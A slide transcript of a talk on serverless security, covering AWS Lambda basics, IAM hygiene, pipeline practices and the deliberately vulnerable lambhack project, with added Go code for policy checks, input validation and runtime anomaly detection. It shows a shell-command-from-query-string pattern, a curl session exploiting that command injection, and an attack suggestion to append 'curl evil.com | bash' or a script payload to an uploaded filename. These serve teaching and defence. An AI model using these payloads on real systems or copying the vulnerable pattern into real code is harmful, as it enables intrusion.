serverless security: a pragmatic primer for builders and defenders
TRANSCRIPT
Velocity San Jose 2017 @WICKETT
SERVERLESS SECURITY: A PRAGMATIC PRIMER FOR BUILDERS AND DEFENDERS
JAMES WICKETT
‣ DEVOPS DAYS AUSTIN ORGANIZER
‣ HEAD OF RESEARCH AT SIGNAL SCIENCES
‣ AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM
‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM
JAMES WICKETT
Don’t worry, this is not a thinly veiled vendor pitch.
‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION.
‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING
‣ SECURITY WITH SERVERLESS IS EASIER
‣ SECURITY WITH SERVERLESS IS HARDER
CONCLUSION (1 OF 2)
‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY
‣ SOFTWARE SUPPLY CHAIN SECURITY
‣ DELIVERY PIPELINE SECURITY
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT
‣ GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
WHAT IS SERVERLESS?
MISCONCEPTIONS
IT’S MARKETING (CLOUD REBRANDED)
SERVERLESS == NO SERVERS
SERVERLESS == BACKEND AS A SERVICE
SERVERLESS == PLATFORM AS A SERVICE
TK: ADRIANCO QUOTE
SO, WHAT IS SERVERLESS?
http://martinfowler.com/articles/serverless.html
@MIKEBROBERTS
‣ 2012 - USED TO DESCRIBE BAAS AND CONTINUOUS INTEGRATION SERVICES RUN BY THIRD PARTIES
‣ LATE 2014 - AWS LAUNCHED LAMBDA
‣ JULY 2015 - AWS LAUNCHED API GATEWAY
‣ OCTOBER 2015 - AWS RE:INVENT - THE SERVERLESS COMPANY USING AWS LAMBDA
‣ 2015 TO PRESENT - FRAMEWORKS FORMING
‣ 2016 - GOOGLE CLOUD FUNCTIONS, AZURE FUNCTIONS RELEASED
‣ 2016 - SERVERLESS CONFERENCES STARTED
HISTORY OF SERVERLESS
[Figure: waste vs. value across Hardware, VMs and Serverless; inspiration from @adrianco]
Decomposed Microservice Architecture
WHAT CAN WE SAY IS SERVERLESS?
SERVERLESS IS FUNCTIONS AS A SERVICE
(FaaS)
CONTAINERS ON DEMAND
SERVERLESS IS (NO MANAGEMENT OF) SERVERS
SERVERLESS IS SERVICEFULL
SERVERLESS IS AN OPINIONATED FRAMEWORK FOR COMPUTE AND CONTAINERS
If you want to lead your company bravely into the new world, you would do well to focus a lot on how serverless will evolve. - @Cloudopinion
https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
THE CLOUD WAS TO VIRTUALIZATION AS SERVERLESS WILL BE TO CONTAINERS
Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
SERVERLESS DEFINITION
SO, WHAT ARE THE UPSIDES?
SCALING BUILT IN
PAY FOR WHAT YOU USE IN 100MS INCREMENTS
WITH SERVERLESS, SYSTEM ADMINISTRATION IS (MOSTLY) LOWER
SHORT CIRCUITS OPS AND MOVES INFRASTRUCTURE RUNTIME CLOSER TO DEVS
YOU CAN SKIP DOCKERING ALL THE THINGS!
GREAT, WHAT’S THE CATCH?
Ops burden to rationalize serverless model
@patrickdebois
VENDOR LOCK-IN
MONITORING
LOGGING
RELIABILITY
‣ APP NEEDS LARGE LOCAL DISK SPACE
‣ LONG RUNNING JOBS
‣ BIG I/O TASKS
‣ LATENCY SENSITIVE REQUESTS THAT CAN’T WAIT FOR THE COLD-STARTUP TIME
SERVERLESS DEAL KILLERS (PROBABLY)
SERVERLESS USE CASES
http://martinfowler.com/articles/serverless.html
MESSAGE PROCESSING
API GATEWAY
WEB APPLICATIONS
‣ CI/CD
‣ auth
‣ wordpress scraper
‣ event ingestion
‣ chatbots
‣ load testing
MORE SERVERLESS USE CASES
Security
LET'S TRY A SAMPLE APPLICATION IN AWS
‣ SERVERLESS
‣ APEX
‣ GO SPARTA
‣ KAPPA
STEP 1: PICK A FRAMEWORK
‣ GOLANG!
‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY
‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM
‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES
GO SPARTA
‣ CLOUDWATCH EVENTS AND LOGS
‣ DYNAMODB, KINESIS
‣ S3
‣ SES, SNS
‣ API GATEWAY CREATION
GO SPARTA INCLUDES
‣ BUILD A WORD CLOUD GENERATOR
‣ ABLE TO CONSUME 3RD PARTY APIS FOR TEXT SOURCES
‣ RETURN JSON WITH COUNTS OF WORDS IN TEXT
‣ KEEP IT SIMPLE
STEP 2: IDEA!
‣ (USING GO SPARTA FOR THE FRAMEWORK)
‣ LAMBDA
‣ S3
‣ API GATEWAY
STEP 3: DESIGN AND ARCHITECTURE
STEP 4: WRITE THE HANDLER
STEP 5: SETUP API GATEWAY
STEP 6: SET THE CONFIG DETAILS
STEP 7: PROVISION YOUR APP!
STEP 8: SETUP STRICT IAM POLICIES
STEP 9: GIVE UP AND SET LOOSE IAM POLICIES, PROMISE TO FIX LATER
STEP 10: PROVISION YOUR APP!
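Steps 8 and 9 are where least privilege usually slips. As an added example (not from the talk and not Go Sparta's code), this Go check parses an IAM policy document and flags every Allow statement that grants a wildcard action or applies to every resource, which is the cheap test to run on a function's role before promotion. The two policies, the bucket name and the account id are constructed placeholders.

```go
package main

import (
	"encoding/json"
	"strings"
)

// statement is the subset of an IAM policy statement this check needs. Action
// and Resource are read in list form (IAM also accepts a bare string, not handled here).
type statement struct {
	Sid      string
	Effect   string
	Action   []string
	Resource []string
}

// WildcardFindings parses a policy document and reports each Allow statement that
// grants a wildcard action ("*" or "s3:*") or applies to every resource ("*").
func WildcardFindings(doc []byte) ([]string, error) {
	var p struct{ Statement []statement }
	if err := json.Unmarshal(doc, &p); err != nil {
		return nil, err
	}
	var out []string
	for _, st := range p.Statement {
		if st.Effect != "Allow" {
			continue
		}
		for _, a := range st.Action {
			if strings.HasSuffix(a, "*") {
				out = append(out, st.Sid+": wildcard action "+a)
			}
		}
		for _, r := range st.Resource {
			if r == "*" {
				out = append(out, st.Sid+": wildcard resource")
			}
		}
	}
	return out, nil
}

// Constructed policies: the step 9 shortcut (everything, everywhere) and a step 8
// policy that only reads the text bucket and writes the function's own log group.
const LoosePolicy = `{"Version":"2012-10-17","Statement":[
 {"Sid":"GiveUp","Effect":"Allow","Action":["*"],"Resource":["*"]}]}`

const StrictPolicy = `{"Version":"2012-10-17","Statement":[
 {"Sid":"ReadText","Effect":"Allow","Action":["s3:GetObject"],
  "Resource":["arn:aws:s3:::EXAMPLE-BUCKET/*"]},
 {"Sid":"Logs","Effect":"Allow","Action":["logs:CreateLogStream","logs:PutLogEvents"],
  "Resource":["arn:aws:logs:us-east-1:111111111111:log-group:/aws/lambda/wordcloud:*"]}]}`
```

Running the check in the deploy pipeline (the "security validation before promotion" step later in the talk) turns the step 9 shortcut into a failed build rather than a promise to fix later.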
APP IN AWS CONSOLE
TEST LAMBDA EXEC IN CONSOLE
FIRST RUN OF 343MS
SECOND RUN ONLY TOOK 84MS
API GATEWAY IN CONSOLE
API GATEWAY EXECUTION IN CONSOLE
RETURNED JSON
MONITORING LAMBDA IN CONSOLE
WHAT I LEARNED ABOUT SERVERLESS SECURITY
SECURITY
‣ SECURE SOFTWARE SUPPLY CHAIN
‣ DELIVERY PIPELINE
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
FOUR AREAS OF SERVERLESS SECURITY
source: @devsecops
‣ THE CODE YOU WRITE (AND LIBS) IS YOUR SURFACE AREA NOW
‣ CHANGE FROM THE PAST (E.G. SHELLSHOCK, HEARTBLEED) OF THE NUMEROUS FIREDRILLS OUR INDUSTRY HAD TO ENDURE DUE TO INHERITANCE
SURFACE AREA REDUCTION
‣ TLS CONTROL TO THE PROVIDER
‣ ROUTING CONTROL TO THE PROVIDER
‣ CONSUMPTION OF THIRD PARTY SERVICES
‣ IAM ROLES AND POLICY CONFUSION
SURFACE AREA EXPANSION
SSL / TLS FROM THE PROVIDER
OLD WAY
NEW WAY
ROUTING FROM THE PROVIDER
ROUTING THE OLD WAY
ROUTING THE NEW WAY
Lambda + s3 + kinesis + DynamoDB + cloudformation + API Gateway + Auth0
SERVICE AND 3RD PARTY EXPANSION
https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
IAM ROLES AND POLICIES
Recommendation: Use a third-party service to monitor for provider config changes
‣ DISABLE ROOT ACCESS KEYS
‣ MANAGE USERS WITH PROFILES
‣ SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM
‣ SECURE KEYS IN DEV SYSTEM
‣ USE PROVIDER MFA
USE GOOD HYGIENE WITH YOUR PROVIDER
DELIVERY PIPELINE SECURITY
UNIT TESTING
EASIER TO MOCK
HARDER TO MOCK
UNIT TESTING EVEN MORE CRITICAL AS INTEGRATION TESTING IN DEV IS HARDER
‣ USE OF A STAGING OR PRE-PROD ENV
‣ END TO END SYNTHETIC INTEGRATION TESTS
‣ ALL THE USUAL SUSPECTS
INTEGRATION TESTING
CONFIGURATION IS PART OF DELIVERY
‣ ONLY DEV KEYS CAN PUSH TO ‘DEV’
‣ ONLY BUILD/DEPLOY SYSTEM CAN PUSH TO PRE-PROD
‣ INTEGRATION TESTS MUST PASS IN THIS ENV
‣ SECURITY VALIDATION MUST TAKE PLACE BEFORE PROMOTION
‣ ALLOW PUSH TO PROD, ONLY BY DEPLOY SYSTEM
GOOD PIPELINE PRACTICES
‣ BDD-SECURITY - GITHUB.COM/CONTINUUMSECURITY/BDD-SECURITY
‣ GAUNTLT - GAUNTLT.ORG
‣ GITHUB.COM/GAUNTLT/GAUNTLT
‣ DOCKER RECOMMENDED
SECURITY TESTING TOOLS
http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
GAUNTLT WORKSHOP IN 9 EXAMPLES
DATA FLOW
‣ DEVELOPMENT
‣ DATA FLOW DIAGRAMS
‣ THREAT MODELING
‣ RUNTIME
‣ LOGGING
‣ CUSTOM MONITORS/METRICS
Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner.
https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
‣ SPOOFING CONSUMED RESOURCES
‣ DENIAL OF SERVICE
‣ TIMEOUTS
‣ EXECUTION RESTRICTIONS FOR RESOURCES
‣ CAPACITY ISSUES
DATA FLOW SECURITY
ATTACK DETECTION
DOES APPLICATION SECURITY STILL MATTER?
https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4
APPSEC GREATEST HITS (XSS, SQLI, CMDEXE) STILL RELEVANT 15 YEARS LATER!
‣ SERVERLESS HAS A FALSE SENSE OF SECURITY
‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)
‣ WANTED TO MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS…
INTRODUCING LAMBHACK
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ OPEN SOURCE, MIT LICENSED
‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING
‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP
‣ GITHUB.COM/WICKETT/LAMBHACK
github.com/wickett/lambhack
lambhack is a vulnerable serverless lambda application
It would certainly be a bad idea to base any coding patterns off what you see here.
BAD CODE IS BAD CODE, EVEN IN SERVERLESS…
// lambhack: the raw query-string value becomes the command line handed to a shell runner
command := lambdaEvent.QueryParams["args"]
output := runner.Run(command)
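The lambhack snippet above takes the `args` value straight from the query string and runs it. As an added example (not lambhack's code and not Go Sparta's), this is how the word-cloud handler could take its one real parameter instead: an allowlisted text-source name, checked before use and never handed to a shell, with a structured log event on every rejection so the attack-detection side has something to count. The `LambdaEvent` shape, the `source` parameter and the allowlist are assumptions for the example.

```go
package main

import (
	"encoding/json"
	"errors"
	"regexp"
)

// LambdaEvent mirrors the shape the lambhack snippet reads from (query-string
// parameters as a map); assumed for this example.
type LambdaEvent struct {
	QueryParams map[string]string `json:"queryParams"`
}

// ErrRejected is returned for any value that fails the allowlist.
var ErrRejected = errors.New("parameter rejected: not on allowlist")

// The word-cloud app only needs to choose a text source, so the handler never
// needs a shell at all. The allowlist is constructed for the example.
var allowedSources = map[string]bool{"wikipedia": true, "rss": true}

// safeToken refuses spaces and shell metacharacters (; | & $ ` ...) outright,
// so even a future source name cannot smuggle a command line through.
var safeToken = regexp.MustCompile(`^[a-z0-9_-]{1,32}$`)

// SecurityEvent is the JSON log line emitted on a rejected request so that
// CloudWatch-side monitoring can count and alert on them.
type SecurityEvent struct {
	Kind      string `json:"kind"`
	Parameter string `json:"parameter"`
	Value     string `json:"value"`
	RequestID string `json:"requestId"`
}

// ValidateSource replaces `command := lambdaEvent.QueryParams["args"]`:
// it returns the chosen source, or an error plus the log line to emit.
func ValidateSource(ev LambdaEvent, requestID string) (string, []byte, error) {
	raw := ev.QueryParams["source"]
	if safeToken.MatchString(raw) && allowedSources[raw] {
		return raw, nil, nil
	}
	// JSON encoding escapes newlines and quotes, so the rejected value can be
	// logged verbatim without letting it forge extra log records.
	line, _ := json.Marshal(SecurityEvent{
		Kind: "input_rejected", Parameter: "source", Value: raw, RequestID: requestID,
	})
	return "", line, ErrRejected
}
```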
With command execution available to us in lambhack, we can poke around the container a bit
UNAME -A
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
CAT /PROC/VERSION
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1"
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
LET’S LOOK IN /TMP
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"
> total 17916
> drwx------  2 sbx_user1056 490      4096 Feb  8 22:02 .
> drwxr-xr-x 21 root         root     4096 Feb  8 21:47 ..
> -rwxrwxr-x  1 sbx_user1056 490  18334049 Feb  8 22:02 Sparta.lambda.amd64
LAMBDA REUSE IN ACTION!
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64 wickettfile
WHICH CURL
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"
> /usr/bin/curl
‣ ADD XSS
‣ ADD OTHER INJECTION ATTACKS
‣ ADD AUTH VECTORS
‣ …
‣ PULL REQUESTS ACCEPTED :)
FUTURE OF LAMBHACK
‣ LAMBDA HAS LIMITED BLAST RADIUS, BUT NOT ZERO
‣ MONITORING/LOGGING PLAYS A KEY ROLE HERE
‣ DETECT LONGER RUN TIMES
‣ HIGHER ERROR RATE OCCURRENCES
‣ DATA INGESTION
‣ LOG ACTIONS OF LAMBDAS
APPSEC THOUGHTS
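"Detect longer run times" can start from the REPORT line that Lambda writes to CloudWatch Logs for every invocation. As an added example (not from the talk), this Go code parses those lines and flags invocations that run far above the warm-run baseline; the log excerpt is constructed, with placeholder request ids, using the 343 ms and 84 ms timings from the console runs earlier and one invocation padded by a `sleep 1` like the ones in the curl session.

```go
package main

import (
	"regexp"
	"strconv"
	"strings"
)
// reportLine matches the RequestId and Duration fields of the REPORT line
// that Lambda writes to CloudWatch Logs at the end of every invocation.
var reportLine = regexp.MustCompile(`^REPORT RequestId: (\S+)\s+Duration: ([0-9.]+) ms`)
type Invocation struct {
	RequestID  string
	DurationMs float64
}

// ParseReports extracts every REPORT line; START/END lines and app output are skipped.
func ParseReports(logs string) []Invocation {
	var out []Invocation
	for _, ln := range strings.Split(logs, "\n") {
		m := reportLine.FindStringSubmatch(ln)
		if m == nil {
			continue
		}
		d, err := strconv.ParseFloat(m[2], 64)
		if err != nil {
			continue
		}
		out = append(out, Invocation{RequestID: m[1], DurationMs: d})
	}
	return out
}

// SlowInvocations returns the request ids that ran longer than baselineMs*factor. With
// the 84 ms warm baseline, factor 5 (420 ms) spares the 343 ms cold start but catches a sleep 1.
func SlowInvocations(invs []Invocation, baselineMs, factor float64) []string {
	var ids []string
	for _, inv := range invs {
		if inv.DurationMs > baselineMs*factor {
			ids = append(ids, inv.RequestID)
		}
	}
	return ids
}

// SampleLogs is a constructed CloudWatch excerpt: cold start, warm run, and one
// invocation that ran "; sleep 1". Real lines separate fields with tabs; \s+ accepts both.
const SampleLogs = `START RequestId: req-0001 Version: $LATEST
REPORT RequestId: req-0001  Duration: 343.21 ms  Billed Duration: 400 ms  Memory Size: 128 MB  Max Memory Used: 31 MB
REPORT RequestId: req-0002  Duration: 84.02 ms  Billed Duration: 100 ms  Memory Size: 128 MB  Max Memory Used: 31 MB
REPORT RequestId: req-0003  Duration: 1090.55 ms  Billed Duration: 1100 ms  Memory Size: 128 MB  Max Memory Used: 31 MB`
```

The same REPORT lines carry the billed duration, so the factor can also be tuned against cost rather than latency.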
APPLICATION SECURITY IS STILL RELEVANT
‣ New surface area, similar appsec problems
‣ Command Exec
‣ XSS
‣ Injection Attacks
‣ Try new things, e.g. appending ‘curl evil.com | bash’ or <script>alert(1)</script> to a filename you upload on s3
TYPES OF ATTACKS
‣ LOGGING, EMITTING EVENTS
‣ USAGE METRICS
‣ VANDIUM (SQLI) WRAPPER
‣ CONTENT SECURITY POLICY (CSP)
‣ MORE THINGS NEED TO BE DONE HERE…
DEFENSE
Development in serverless is easier than ever and is attracting new developers to web development; as a result, application security will see a rise.
FINAL THOUGHT
WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS?
Send an email to [email protected]